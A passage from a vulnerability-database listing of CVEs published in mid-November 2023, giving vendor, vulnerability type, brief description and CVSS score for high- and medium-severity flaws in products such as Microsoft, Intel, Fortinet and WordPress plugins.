CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to execute an arbitrary OS command.

7.2
2023-11-14 CVE-2023-45625 Arubanetworks
HP
Command Injection vulnerability in multiple products

Multiple authenticated command injection vulnerabilities exist in the command line interface.

7.2
2023-11-14 CVE-2023-45626 Arubanetworks
HP
An authenticated vulnerability has been identified allowing an attacker to effectively establish highly privileged persistent arbitrary code execution across boot cycles.
7.2
2023-11-14 CVE-2023-22448 Intel Unspecified vulnerability in Intel Unison Software

Improper access control for some Intel Unison software may allow a privileged user to potentially enable escalation of privilege via network access.

7.2
2023-11-14 CVE-2023-36401 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Remote Registry Service Remote Code Execution Vulnerability

7.2
2023-11-14 CVE-2023-44317 Siemens Acceptance of Extraneous Untrusted Data With Trusted Data vulnerability in Siemens products

Affected products do not properly validate the content of uploaded X509 certificates which could allow an attacker with administrative privileges to execute arbitrary code on the device.

7.2
2023-11-14 CVE-2023-45880 Gibbonedu Path Traversal vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon through version 25.0.0 allows Directory Traversal via the report template builder.

7.2
2023-11-16 CVE-2023-6017 H2O Unspecified vulnerability in H2O

H2O included a reference to an S3 bucket that no longer existed allowing an attacker to take over the S3 bucket URL.

7.1
2023-11-15 CVE-2023-34982 Aveva Externally Controlled Reference to a Resource in Another Sphere vulnerability in Aveva products

This external control vulnerability, if exploited, could allow a local OS-authenticated user with standard privileges to delete files with System privilege on the machine where these products are installed, resulting in denial of service.

7.1
2023-11-15 CVE-2023-31100 Phoenix Unspecified vulnerability in Phoenix Securecore Technology

Improper Access Control in SMI handler vulnerability in Phoenix SecureCore™ Technology™ 4 allows SPI flash modification. This issue affects SecureCore™ Technology™ 4: * from 4.3.0.0 before 4.3.0.203 * from 4.3.1.0 before 4.3.1.163 * from 4.4.0.0 before 4.4.0.217 * from 4.5.0.0 before 4.5.0.138

7.1
2023-11-14 CVE-2023-47630 Kyverno Insufficient Verification of Data Authenticity vulnerability in Kyverno

Kyverno is a policy engine designed for Kubernetes.

7.1
2023-11-14 CVE-2022-40681 Fortinet Incorrect Authorization vulnerability in Fortinet Forticlient

A incorrect authorization in Fortinet FortiClient (Windows) 7.0.0 - 7.0.7, 6.4.0 - 6.4.9, 6.2.0 - 6.2.9 and 6.0.0 - 6.0.10 allows an attacker to cause denial of service via sending a crafted request to a specific named pipe.

7.1
2023-11-14 CVE-2023-32701 Blackberry Unspecified vulnerability in Blackberry QNX Software Development Platform 6.6.0/7.0/7.1

Improper Input Validation in the Networking Stack of QNX SDP version(s) 6.6, 7.0, and 7.1 could allow an attacker to potentially cause Information Disclosure or a Denial-of-Service condition.

7.1
2023-11-14 CVE-2023-36046 Microsoft Unspecified vulnerability in Microsoft products

Windows Authentication Denial of Service Vulnerability

7.1
2023-11-14 CVE-2023-36399 Microsoft Unspecified vulnerability in Microsoft products

Windows Storage Elevation of Privilege Vulnerability

7.1
2023-11-14 CVE-2023-36394 Microsoft Unspecified vulnerability in Microsoft products

Windows Search Service Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36403 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36405 Microsoft Unspecified vulnerability in Microsoft products

Windows Kernel Elevation of Privilege Vulnerability

7.0
2023-11-14 CVE-2023-36427 Microsoft Unspecified vulnerability in Microsoft products

Windows Hyper-V Elevation of Privilege Vulnerability

7.0

312 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-14 CVE-2023-27383 Intel Unspecified vulnerability in Intel products

Protection mechanism failure in some Intel(R) oneAPI HPC Toolkit 2023.1 and Intel(R)MPI Library software before version 2021.9 may allow a privileged user to potentially enable escalation of privilege via adjacent access.

6.8
2023-11-14 CVE-2023-38177 Microsoft Unspecified vulnerability in Microsoft Sharepoint Enterprise Server and Sharepoint Server

Microsoft SharePoint Server Remote Code Execution Vulnerability

6.8
2023-11-14 CVE-2023-46446 Asyncssh Project Authorization Bypass Through User-Controlled Key vulnerability in Asyncssh Project Asyncssh

An issue in AsyncSSH before 2.14.1 allows attackers to control the remote end of an SSH client session via packet injection/removal and shell emulation, aka a "Rogue Session Attack."

6.8
2023-11-16 CVE-2023-32469 Dell Improper Input Validation vulnerability in Dell products

Dell Precision Tower BIOS contains an Improper Input Validation vulnerability.

6.7
2023-11-14 CVE-2022-24379 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server System M70KLP Family BIOS firmware before version 01.04.0029 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-29262 Intel Unspecified vulnerability in Intel products

Improper buffer restrictions in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-29510 Intel Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Intel products

Improper buffer restrictions in some Intel(R) Server Board M10JNP2SB BIOS firmware before version 7.219 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-33945 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server board and Intel(R) Server System BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-36374 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmi Windows 5.27.03.0003 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2022-36396 Intel Unspecified vulnerability in Intel Aptio V Uefi Firmware Integrator Tools 5.27.03.0003/5.27.06.0017

Improper access control in some Intel(R) Aptio* V UEFI Firmware Integrator Tools before version iDmiEdit-Linux-5.27.06.0017 may allow a privileged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2023-20567 Intel
AMD
Improper Verification of Cryptographic Signature vulnerability in multiple products

Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch AMDSoftwareInstaller.exe without validating the file signature potentially leading to arbitrary code execution.

6.7
2023-11-14 CVE-2023-20568 Intel
AMD
Improper Verification of Cryptographic Signature vulnerability in multiple products

Improper signature verification of RadeonTM RX Vega M Graphics driver for Windows may allow an attacker with admin privileges to launch RadeonInstaller.exe without validating the file signature potentially leading to arbitrary code execution.

6.7
2023-11-14 CVE-2023-29177 Fortinet Classic Buffer Overflow vulnerability in Fortinet Fortiadc and Fortiddos-F

Multiple buffer copy without checking size of input ('classic buffer overflow') vulnerabilities [CWE-120] in FortiADC version 7.2.0 and before 7.1.2 & FortiDDoS-F version 6.5.0 and before 6.4.1 allows a privileged attacker to execute arbitrary code or commands via specifically crafted CLI requests.

6.7
2023-11-14 CVE-2023-32662 Intel Unspecified vulnerability in Intel Battery Life Diagnostic Tool 1.0.7/2.2.0

Improper authorization in some Intel Battery Life Diagnostic Tool installation software before version 2.2.1 may allow a privilaged user to potentially enable escalation of privilege via local access.

6.7
2023-11-14 CVE-2023-34431 Intel Unspecified vulnerability in Intel products

Improper input validation in some Intel(R) Server Board BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access

6.7
2023-11-14 CVE-2023-28002 Fortinet Improper Validation of Integrity Check Value vulnerability in Fortinet Fortios

An improper validation of integrity check value vulnerability [CWE-354] in FortiOS 7.2.0 through 7.2.3, 7.0.0 through 7.0.12, 6.4 all versions, 6.2 all versions, 6.0 all versions and FortiProxy 7.2 all versions, 7.0 all versions, 2.0 all versions VMs may allow a local attacker with admin privileges to boot a malicious image on the device and bypass the filesystem integrity check in place.

6.7
2023-11-14 CVE-2023-6006 Papercut Unspecified vulnerability in Papercut MF

This vulnerability potentially allows local attackers to escalate privileges on affected installations of PaperCut NG.

6.7
2023-11-16 CVE-2023-36008 Microsoft Unspecified vulnerability in Microsoft Edge Chromium

Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability

6.6
2023-11-18 CVE-2023-48736 Color Out-of-bounds Read vulnerability in Color Demoiccmax 20231109

In International Color Consortium DemoIccMAX 3e7948b, CIccCLUT::Interp2d in IccTagLut.cpp in libSampleICC.a has an out-of-bounds read.

6.5
2023-11-18 CVE-2023-40363 IBM Incorrect Default Permissions vulnerability in IBM Infosphere Information Server 11.7

IBM InfoSphere Information Server 11.7 could allow an authenticated user to change installation files due to incorrect file permission settings.

6.5
2023-11-17 CVE-2023-48024 Howerj Use After Free vulnerability in Howerj Liblisp

Liblisp through commit 4c65969 was discovered to contain a use-after-free vulnerability in void hash_destroy(hash_table_t *h) at hash.c

6.5
2023-11-17 CVE-2023-22268 Adobe SQL Injection vulnerability in Adobe Robohelp Server

Adobe RoboHelp Server versions 11.4 and earlier are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead to information disclosure by an low-privileged authenticated attacker.

6.5
2023-11-17 CVE-2023-38314 Opennds NULL Pointer Dereference vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

6.5
2023-11-17 CVE-2023-42428 Cubecart Path Traversal vulnerability in Cubecart

Directory traversal vulnerability in CubeCart prior to 6.5.3 allows a remote authenticated attacker with an administrative privilege to delete directories and files in the system.

6.5
2023-11-16 CVE-2023-6174 Wireshark
Debian
Injection vulnerability in multiple products

SSH dissector crash in Wireshark 4.0.0 to 4.0.10 allows denial of service via packet injection or crafted capture file

6.5
2023-11-16 CVE-2023-43757 Elecom Inadequate Encryption Strength vulnerability in Elecom products

Inadequate encryption strength vulnerability in multiple routers provided by ELECOM CO.,LTD.

6.5
2023-11-16 CVE-2023-47335 Autelrobotics Incorrect Default Permissions vulnerability in Autelrobotics EVO Nano Drone Firmware 1.6.5

Insecure permissions in the setNFZEnable function of Autel Robotics EVO Nano drone v1.6.5 allows attackers to breach the geo-fence and fly into no-fly zones.

6.5
2023-11-16 CVE-2023-47471 Struktur Classic Buffer Overflow vulnerability in Struktur Libde265 1.0.12

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

6.5
2023-11-16 CVE-2023-48204 Publiccms Server-Side Request Forgery (SSRF) vulnerability in Publiccms 4.0.202302.E

An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component.

6.5
2023-11-15 CVE-2023-43588 Zoom Unspecified vulnerability in Zoom Meetings

Insufficient control flow management in some Zoom clients may allow an authenticated user to conduct an information disclosure via network access.

6.5
2023-11-14 CVE-2023-39199 Zoom Unspecified vulnerability in Zoom products

Cryptographic issues with In-Meeting Chat for some Zoom clients may allow a privileged user to conduct an information disclosure via network access.

6.5
2023-11-14 CVE-2023-39205 Zoom Improper Check for Unusual or Exceptional Conditions vulnerability in Zoom products

Improper conditions check in Zoom Team Chat for Zoom clients may allow an authenticated user to conduct a denial of service via network access.

6.5
2023-11-14 CVE-2023-45627 Arubanetworks
HP
An authenticated Denial-of-Service (DoS) vulnerability exists in the CLI service.
6.5
2023-11-14 CVE-2023-5189 Redhat Path Traversal vulnerability in Redhat Ansible Automation Platform and Satellite

A path traversal vulnerability exists in Ansible when extracting tarballs.

6.5
2023-11-14 CVE-2023-46023 Code Projects SQL Injection vulnerability in Code-Projects Simple Task List 1.0

SQL injection vulnerability in addTask.php in Code-Projects Simple Task List 1.0 allows attackers to obtain sensitive information via the 'status' parameter.

6.5
2023-11-14 CVE-2023-46132 Hyperledger Race Condition vulnerability in Hyperledger Fabric

Hyperledger Fabric is an open source permissioned distributed ledger framework.

6.5
2023-11-14 CVE-2023-47641 Aiohttp HTTP Request Smuggling vulnerability in Aiohttp

aiohttp is an asynchronous HTTP client/server framework for asyncio and Python.

6.5
2023-11-14 CVE-2023-20592 AMD Unspecified vulnerability in AMD products

Improper or unexpected behavior of the INVD instruction in some AMD CPUs may allow an attacker with a malicious hypervisor to affect cache line write-back behavior of the CPU leading to a potential loss of guest virtual machine (VM) memory integrity.

6.5
2023-11-14 CVE-2023-22290 Intel Improper Check for Unusual or Exceptional Conditions vulnerability in Intel Unison Software

Uncaught exception for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access.

6.5
2023-11-14 CVE-2023-28376 Intel Out-of-bounds Read vulnerability in Intel products

Out-of-bounds read in the firmware for some Intel(R) E810 Ethernet Controllers and Adapters before version 1.7.1 may allow an unauthenticated user to potentially enable denial of service via adjacent access.

6.5
2023-11-14 CVE-2023-38131 Intel Improper Input Validation vulnerability in Intel Unison Software

Improper input validationation for some Intel Unison software may allow an authenticated user to potentially enable denial of service via network access.

6.5
2023-11-14 CVE-2023-36043 Microsoft Exposure of Resource to Wrong Sphere vulnerability in Microsoft System Center Operations Manager 2016/2019/2022

Open Management Infrastructure Information Disclosure Vulnerability

6.5
2023-11-14 CVE-2023-36398 Microsoft Unspecified vulnerability in Microsoft products

Windows NTFS Information Disclosure Vulnerability

6.5
2023-11-14 CVE-2023-36413 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Office Security Feature Bypass Vulnerability

6.5
2023-11-14 CVE-2023-36641 Fortinet Numeric Truncation Error vulnerability in Fortinet Fortios and Fortiproxy

A numeric truncation error in Fortinet FortiProxy version 7.2.0 through 7.2.4, FortiProxy version 7.0.0 through 7.0.10, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1, all versions, FortiProxy 1.0 all versions, FortiOS version 7.4.0, FortiOS version 7.2.0 through 7.2.5, FortiOS version 7.0.0 through 7.0.12, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions allows attacker to denial of service via specifically crafted HTTP requests.

6.5
2023-11-14 CVE-2023-41676 Fortinet Insufficiently Protected Credentials vulnerability in Fortinet Fortisiem

An exposure of sensitive information to an unauthorized actor [CWE-200] in FortiSIEM version 7.0.0 and before 6.7.5 may allow an attacker with access to windows agent logs to obtain the windows agent password via searching through the logs.

6.5
2023-11-14 CVE-2023-43505 Siemens Improper Access Control vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions).

6.5
2023-11-14 CVE-2023-44321 Siemens Resource Exhaustion vulnerability in Siemens products

Affected devices do not properly validate the length of inputs when performing certain configuration changes in the web interface allowing an authenticated attacker to cause a denial of service condition.

6.5
2023-11-14 CVE-2023-46096 Siemens Missing Authentication for Critical Function vulnerability in Siemens Simatic PCS NEO 3.0

A vulnerability has been identified in SIMATIC PCS neo (All versions < V4.1).

6.5
2023-11-14 CVE-2023-43900 Emsigner Authorization Bypass Through User-Controlled Key vulnerability in Emsigner 2.8.7

Insecure Direct Object References (IDOR) in EMSigner v2.8.7 allow attackers to gain unauthorized access to application content and view sensitive data of other users via manipulation of the documentID and EncryptedDocumentId parameters.

6.5
2023-11-13 CVE-2023-23684 Wpengine Unspecified vulnerability in Wpengine Wpgraphql

Server-Side Request Forgery (SSRF) vulnerability in WPGraphQL.This issue affects WPGraphQL: from n/a through 1.14.5.

6.5
2023-11-13 CVE-2023-23800 Getshortcodes Server-Side Request Forgery (SSRF) vulnerability in Getshortcodes Shortcodes Ultimate

Server-Side Request Forgery (SSRF) vulnerability in Vova Anokhin WP Shortcodes Plugin — Shortcodes Ultimate.This issue affects WP Shortcodes Plugin — Shortcodes Ultimate: from n/a through 5.12.6.

6.5
2023-11-13 CVE-2023-41239 Blubrry Server-Side Request Forgery (SSRF) vulnerability in Blubrry Powerpress

Server-Side Request Forgery (SSRF) vulnerability in Blubrry PowerPress Podcasting plugin by Blubrry.This issue affects PowerPress Podcasting plugin by Blubrry: from n/a through 11.0.6.

6.5
2023-11-18 CVE-2023-40809 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Activity Search Criteria-Activity Number.

6.1
2023-11-18 CVE-2023-40810 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Product Name Field.

6.1
2023-11-18 CVE-2023-40812 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Group Name Field.

6.1
2023-11-18 CVE-2023-40813 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Saved Search Creation.

6.1
2023-11-18 CVE-2023-40814 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Accounts Name Field.

6.1
2023-11-18 CVE-2023-40815 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Category Creation Name Field.

6.1
2023-11-18 CVE-2023-40816 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via Activity Milestone Name Field.

6.1
2023-11-18 CVE-2023-40817 Opencrx Cross-site Scripting vulnerability in Opencrx 5.2.0

OpenCRX version 5.2.0 is vulnerable to HTML injection via the Product Configuration Name Field.

6.1
2023-11-17 CVE-2023-44352 Adobe Cross-site Scripting vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability.

6.1
2023-11-17 CVE-2020-11448 Bell Cross-site Scripting vulnerability in Bell Home HUB 3000 Firmware Sg48222070

An issue was discovered on Bell HomeHub 3000 SG48222070 devices.

6.1
2023-11-17 CVE-2023-47797 Liferay Cross-site Scripting vulnerability in Liferay Portal

Reflected cross-site scripting (XSS) vulnerability on a content page’s edit page in Liferay Portal 7.4.3.94 through 7.4.3.95 allows remote attackers to inject arbitrary web script or HTML via the `p_l_back_url_title` parameter.

6.1
2023-11-16 CVE-2023-40314 Opennms Cross-site Scripting vulnerability in Opennms Horizon

Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information.

6.1
2023-11-16 CVE-2023-28621 Wishfulthemes Cross-site Scripting vulnerability in Wishfulthemes Raise MAG and Wishful Blog

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wishfulthemes Raise Mag, Wishfulthemes Wishful Blog themes allows Reflected XSS.This issue affects Raise Mag: from n/a through 1.0.7; Wishful Blog: from n/a through 2.0.1.

6.1
2023-11-16 CVE-2023-32796 Mingocommerce Cross-site Scripting vulnerability in Mingocommerce Woocommerce Product Enquiry

Unauth.

6.1
2023-11-16 CVE-2023-34375 10Web Cross-site Scripting vulnerability in 10Web SEO

Unauth.

6.1
2023-11-16 CVE-2023-39926 Acurax Cross-site Scripting vulnerability in Acurax Under Construction / Maintenance Mode 2.6

Unauth.

6.1
2023-11-16 CVE-2023-47508 Averta Cross-site Scripting vulnerability in Averta Master Slider 3.2.7/3.5.1

Unauth.

6.1
2023-11-16 CVE-2023-47509 Ioannup Cross-site Scripting vulnerability in Ioannup Edit Woocommerce Templates

Unauth.

6.1
2023-11-16 CVE-2023-47512 Wphive Cross-site Scripting vulnerability in Wphive Product Enquiry for Woocommerce

Unauth.

6.1
2023-11-16 CVE-2023-47514 Star Emea Cross-site Scripting vulnerability in Star-Emea Star Cloudprnt for Woocommerce

Unauth.

6.1
2023-11-16 CVE-2023-4771 Cksource Unspecified vulnerability in Cksource Ckeditor

A Cross-Site scripting vulnerability has been found in CKSource CKEditor affecting versions 4.15.1 and earlier.

6.1
2023-11-15 CVE-2023-41699 Payara Open Redirect vulnerability in Payara

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Payara Platform Payara Server, Micro and Embedded (Servlet Implementation modules) allows Redirect Access to Libraries.This issue affects Payara Server, Micro and Embedded: from 5.0.0 before 5.57.0, from 4.1.2.191 before 4.1.2.191.46, from 6.0.0 before 6.8.0, from 6.2023.1 before 6.2023.11.

6.1
2023-11-15 CVE-2023-48219 Tiny Cross-site Scripting vulnerability in Tiny Tinymce

TinyMCE is an open source rich text editor.

6.1
2023-11-15 CVE-2023-4602 Kibokolabs Cross-site Scripting vulnerability in Kibokolabs Namaste! LMS

The Namaste! LMS plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'course_id' parameter in versions up to, and including, 2.6.1.1 due to insufficient input sanitization and output escaping.

6.1
2023-11-15 CVE-2023-41597 Eyoucms Cross-site Scripting vulnerability in Eyoucms 1.6.2

EyouCms v1.6.2 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /admin/twitter.php?active_t.

6.1
2023-11-15 CVE-2023-5986 Schneider Electric Open Redirect vulnerability in Schneider-Electric Ecostruxure Power Monitoring Expert 2020/2021

A CWE-601 URL Redirection to Untrusted Site vulnerability exists that could cause an openredirect vulnerability leading to a cross site scripting attack.

6.1
2023-11-15 CVE-2023-5987 Schneider Electric Cross-site Scripting vulnerability in Schneider-Electric Ecostruxure Power Monitoring Expert 2020/2021

A CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) vulnerability that could cause a vulnerability leading to a cross site scripting condition where attackers can have a victim’s browser run arbitrary JavaScript when they visit a page containing the injected payload.

6.1
2023-11-14 CVE-2023-47517 Pressified Cross-site Scripting vulnerability in Pressified Sendpress

Unauth.

6.1
2023-11-14 CVE-2023-47518 Vfbpro Cross-site Scripting vulnerability in Vfbpro Restrict Categories

Unauth.

6.1
2023-11-14 CVE-2023-47520 Michaeluno Cross-site Scripting vulnerability in Michaeluno Responsive Column Widgets

Unauth.

6.1
2023-11-14 CVE-2023-47522 Photofeed Cross-site Scripting vulnerability in Photofeed Photo Feed

Unauth.

6.1
2023-11-14 CVE-2023-47524 Codebard Cross-site Scripting vulnerability in Codebard Patron Button and Widgets for Patreon

Unauth.

6.1
2023-11-14 CVE-2023-47532 Themeum Cross-site Scripting vulnerability in Themeum WP Crowdfunding

Unauth.

6.1
2023-11-14 CVE-2023-47544 Atarim Cross-site Scripting vulnerability in Atarim Visual Collaboration

Unauth.

6.1
2023-11-14 CVE-2023-47547 Wpfactory Cross-site Scripting vulnerability in Wpfactory Products, Order & Customers Export for Woocommerce

Unauth.

6.1
2023-11-14 CVE-2023-47549 Spider Themes Cross-site Scripting vulnerability in Spider-Themes Eazydocs

Unauth.

6.1
2023-11-14 CVE-2023-47125 Typo3 Cross-site Scripting vulnerability in Typo3 Html Sanitizer and Typo3

TYPO3 is an open source PHP based web content management system released under the GNU GPL.

6.1
2023-11-14 CVE-2023-47550 Rednao Cross-Site Request Forgery (CSRF) vulnerability in Rednao Donations Made Easy - Smart Donations

Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations allows Stored XSS.This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

6.1
2023-11-14 CVE-2021-46758 AMD Unspecified vulnerability in AMD products

Insufficient validation of SPI flash addresses in the ASP (AMD Secure Processor) bootloader may allow an attacker to read data in memory mapped beyond SPI flash resulting in a potential loss of availability and integrity.

6.1
2023-11-14 CVE-2023-36030 Microsoft Unspecified vulnerability in Microsoft Dynamics 365

Microsoft Dynamics 365 Sales Spoofing Vulnerability

6.1
2023-11-14 CVE-2023-48094 Cesium Cross-site Scripting vulnerability in Cesium Cesiumjs 1.111

A cross-site scripting (XSS) vulnerability in CesiumJS v1.111 allows attackers to execute arbitrary code in the context of the victim's browser via sending a crafted payload to /container_files/public_html/doc/index.html.

6.1
2023-11-14 CVE-2023-45881 Gibbonedu Cross-site Scripting vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon through version 25.0.0 allows /modules/Planner/resources_addQuick_ajaxProcess.php file upload with resultant XSS.

6.1
2023-11-14 CVE-2023-47665 Plainviewplugins Cross-site Scripting vulnerability in Plainviewplugins Plainview Protect Passwords

Unauth.

6.1
2023-11-14 CVE-2023-47673 Thecrowned Cross-site Scripting vulnerability in Thecrowned Post PAY Counter 2.789

Unauth.

6.1
2023-11-14 CVE-2023-47684 Themepunch Cross-site Scripting vulnerability in Themepunch Essential Grid

Unauth.

6.1
2023-11-13 CVE-2023-46019 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) vulnerability in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'error' parameter.

6.1
2023-11-13 CVE-2023-46020 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) in updateprofile.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'rename', 'remail', 'rphone' and 'rcity' parameters.

6.1
2023-11-13 CVE-2023-47690 Antonbond Cross-site Scripting vulnerability in Antonbond Additional Order Filters for Woocommerce

Unauth.

6.1
2023-11-13 CVE-2023-47695 Scribit Cross-site Scripting vulnerability in Scribit Shortcodes Finder

Unauth.

6.1
2023-11-13 CVE-2023-47696 Gravitymaster Cross-site Scripting vulnerability in Gravitymaster Product Enquiry for Woocommerce

Unauth.

6.1
2023-11-13 CVE-2023-47697 WP Eventmanager Cross-site Scripting vulnerability in Wp-Eventmanager WP Event Manager

Unauth.

6.1
2023-11-13 CVE-2023-4603 Star Emea Cross-site Scripting vulnerability in Star-Emea Star Cloudprnt for Woocommerce

The Star CloudPRNT for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'printersettings' parameter in versions up to, and including, 2.0.3 due to insufficient input sanitization and output escaping.

6.1
2023-11-13 CVE-2023-46015 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) vulnerability in index.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via 'msg' parameter in application URL.

6.1
2023-11-13 CVE-2023-46016 Code Projects Cross-site Scripting vulnerability in Code-Projects Blood Bank 1.0

Cross Site Scripting (XSS) in abs.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary code via the 'search' parameter in the application URL.

6.1
2023-11-13 CVE-2023-31230 Baidu Tongji Generator Project Cross-Site Request Forgery (CSRF) vulnerability in Baidu-Tongji-Generator Project Baidu-Tongji-Generator 1.0.2

Cross-Site Request Forgery (CSRF) vulnerability in Haoqisir Baidu Tongji generator allows Stored XSS.This issue affects Baidu Tongji generator: from n/a through 1.0.2.

6.1
2023-11-13 CVE-2023-32123 Dream Theme Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 11.6.0/11.7.3

Cross-Site Request Forgery (CSRF) vulnerability in Dream-Theme The7 allows Stored XSS.This issue affects The7: from n/a through 11.7.3.

6.1
2023-11-13 CVE-2023-35877 Vadimk Cross-Site Request Forgery (CSRF) vulnerability in Vadimk Extra User Details

Cross-Site Request Forgery (CSRF) vulnerability in Vadym K.

6.1
2023-11-13 CVE-2023-39166 Tagdiv Cross-Site Request Forgery (CSRF) vulnerability in Tagdiv Composer 4.2

Cross-Site Request Forgery (CSRF) vulnerability in tagDiv tagDiv Composer allows Cross-Site Scripting (XSS).This issue affects tagDiv Composer: from n/a before 4.4.

6.1
2023-11-13 CVE-2023-6098 Icssolution Cross-site Scripting vulnerability in Icssolution ICS Business Manager 7.06.0028.2802/7.06.0028.7066/7.06.0028.7089

An XSS vulnerability has been discovered in ICS Business Manager affecting version 7.06.0028.7066.

6.1
2023-11-13 CVE-2023-40335 Cyberws Cross-Site Request Forgery (CSRF) vulnerability in Cyberws Cleverwise Daily Quotes

Cross-Site Request Forgery (CSRF) vulnerability in Jeremy O'Connell Cleverwise Daily Quotes allows Stored XSS.This issue affects Cleverwise Daily Quotes: from n/a through 3.2.

6.1
2023-11-13 CVE-2023-46092 Lionscripts Cross-Site Request Forgery (CSRF) vulnerability in Lionscripts Webmaster Tools

Cross-Site Request Forgery (CSRF) vulnerability in LionScripts.Com Webmaster Tools allows Stored XSS.This issue affects Webmaster Tools: from n/a through 2.0.

6.1
2023-11-13 CVE-2023-46201 Auto Login NEW User After Registration Project Cross-Site Request Forgery (CSRF) vulnerability in Auto Login NEW User After Registration Project Auto Login NEW User After Registration

Cross-Site Request Forgery (CSRF) vulnerability in Jeff Sherk Auto Login New User After Registration allows Stored XSS.This issue affects Auto Login New User After Registration: from n/a through 1.9.6.

6.1
2023-11-13 CVE-2023-46634 Phoeniixx Cross-Site Request Forgery (CSRF) vulnerability in Phoeniixx Custom MY Account for Woocommerce

Cross-Site Request Forgery (CSRF) vulnerability in phoeniixx Custom My Account for Woocommerce allows Cross-Site Scripting (XSS).This issue affects Custom My Account for Woocommerce: from n/a through 2.1.

6.1
2023-11-13 CVE-2023-47516 Starkdigital Cross-Site Request Forgery (CSRF) vulnerability in Starkdigital Category Post List Widget 1.1/1.2/2.0

Cross-Site Request Forgery (CSRF) vulnerability in Stark Digital Category Post List Widget allows Stored XSS.This issue affects Category Post List Widget: from n/a through 2.0.

6.1
2023-11-13 CVE-2023-47652 Autoaffiliatelinks Cross-Site Request Forgery (CSRF) vulnerability in Autoaffiliatelinks Auto Affiliate Links

Cross-Site Request Forgery (CSRF) vulnerability in Lucian Apostol Auto Affiliate Links allows Stored XSS.This issue affects Auto Affiliate Links: from n/a through 6.4.2.4.

6.1
2023-11-13 CVE-2023-38364 IBM Cross-site Scripting vulnerability in IBM Cics TX 10.1

IBM CICS TX Advanced 10.1 is vulnerable to cross-site scripting.

6.1
2023-11-15 CVE-2023-5676 Eclipse Race Condition vulnerability in Eclipse Openj9

In Eclipse OpenJ9 before version 0.41.0, the JVM can be forced into an infinite busy hang on a spinlock or a segmentation fault if a shutdown signal (SIGTERM, SIGINT or SIGHUP) is received before the JVM has finished initializing.

5.9
2023-11-14 CVE-2023-44322 Siemens Unchecked Return Value vulnerability in Siemens products

Affected devices can be configured to send emails when certain events occur on the device.

5.9
